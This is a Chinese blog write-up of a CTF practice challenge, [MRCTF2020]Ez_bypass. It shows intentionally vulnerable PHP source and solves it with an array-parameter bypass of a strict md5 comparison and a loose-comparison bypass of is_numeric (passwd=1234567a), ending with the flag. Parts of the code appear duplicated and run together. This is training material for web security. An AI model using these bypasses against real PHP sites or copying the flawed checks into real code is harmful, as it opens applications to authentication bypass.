![[MRCTF2020]Ez_bypass – buu刷题笔记,网络安全爱好者中心-神域博客网](https://img.godyu.com/2023/12/20231226130207446.png)
打开题目就是一段代码,我们稍微美化一下,看的清楚点
I put something in F12 for youinclude \'flag.php\';$flag=\'MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}\';if(isset($_GET[\'gg\'])&&isset($_GET[\'id\'])) {$id=$_GET[\'id\'];$gg=$_GET[\'gg\'];if (md5($id) === md5($gg) && $id !== $gg) {echo \'You got the first step\';if(isset($_POST[\'passwd\'])) {$passwd=$_POST[\'passwd\'];if (!is_numeric($passwd)){if($passwd==1234567){echo \'Good Job!\';highlight_file(\'flag.php\');die(\'By Retr_0\');}else{echo \"can you think twice??\";}}else{echo \'You can not get it !\';}}else{die(\'only one way to get the flag\');}}else {echo \"You are not a real hacker!\";}}else{die(\'Please input first\');}}Please input firstI put something in F12 for you include \'flag.php\'; $flag=\'MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}\'; if(isset($_GET[\'gg\'])&&isset($_GET[\'id\'])) { $id=$_GET[\'id\']; $gg=$_GET[\'gg\']; if (md5($id) === md5($gg) && $id !== $gg) { echo \'You got the first step\'; if(isset($_POST[\'passwd\'])) { $passwd=$_POST[\'passwd\']; if (!is_numeric($passwd)) { if($passwd==1234567) { echo \'Good Job!\'; highlight_file(\'flag.php\'); die(\'By Retr_0\'); } else { echo \"can you think twice??\"; } } else{ echo \'You can not get it !\'; } } else{ die(\'only one way to get the flag\'); } } else { echo \"You are not a real hacker!\"; } } else{ die(\'Please input first\'); } }Please input firstI put something in F12 for you include \'flag.php\'; $flag=\'MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}\'; if(isset($_GET[\'gg\'])&&isset($_GET[\'id\'])) { $id=$_GET[\'id\']; $gg=$_GET[\'gg\']; if (md5($id) === md5($gg) && $id !== $gg) { echo \'You got the first step\'; if(isset($_POST[\'passwd\'])) { $passwd=$_POST[\'passwd\']; if (!is_numeric($passwd)) { if($passwd==1234567) { echo \'Good Job!\'; highlight_file(\'flag.php\'); die(\'By Retr_0\'); } else { echo \"can you think twice??\"; } } else{ echo \'You can not get it !\'; } } else{ die(\'only one way to get the flag\'); } } else { echo \"You are not a real hacker!\"; } } else{ die(\'Please input first\'); } }Please input first
按f12获取flag文件,别想了,还是乖乖代码审计吧
1.有一个非常明显的绕过,gg和id,一开始以为是弱类型比较,后来发现是强比较
补充知识
弱等于:== 只需要数值相对就是True
强等于:=== 必须数值和类型完全相同才行
这里可以参考easy_md5这篇文章,简单讲解了如何绕过md5判断
![[BJDCTF2020]Easy MD5 - buu刷题笔记-安全小天地](https://img.godyu.com/2023/12/20231226130207446.png?imageView2/0/format/webp/q/75)
[BJDCTF2020]Easy MD5 – buu刷题笔记
2022年4月18日 11:02
这里我们直接选俩值进行判断
http://72e6ae98-7143-4908-bce0-e4345b77c529.node4.buuoj.cn:81/?id=s878926199a&gg=s155964671ahttp://72e6ae98-7143-4908-bce0-e4345b77c529.node4.buuoj.cn:81/?id=s878926199a&gg=s155964671ahttp://72e6ae98-7143-4908-bce0-e4345b77c529.node4.buuoj.cn:81/?id=s878926199a&gg=s155964671a
You are not a real hacker!
对于强类型判断,md5无法处理数组,所以我们使用数组进行绕过,修改之后
http://72e6ae98-7143-4908-bce0-e4345b77c529.node4.buuoj.cn:81/?id[]=s878926199a&gg[]=s155964671ahttp://72e6ae98-7143-4908-bce0-e4345b77c529.node4.buuoj.cn:81/?id[]=s878926199a&gg[]=s155964671ahttp://72e6ae98-7143-4908-bce0-e4345b77c529.node4.buuoj.cn:81/?id[]=s878926199a&gg[]=s155964671a
2.进入第二个判断。is_numeric()函数用1234567a绕。
1234567a是字符串,但是弱比较的时候,1在前,php会将其整体转成数字,就可以通过比较了。
post:passwd=1234567a
![图片[1]-[MRCTF2020]Ez_bypass – buu刷题笔记-安全小天地](https://www.anquanclub.cn/wp-content/uploads/2022/04/image-96-1024x235.png)
最后flag为flag{76d14489-666b-4b0c-b56b-9039adc3421f}
THE END
暂无评论内容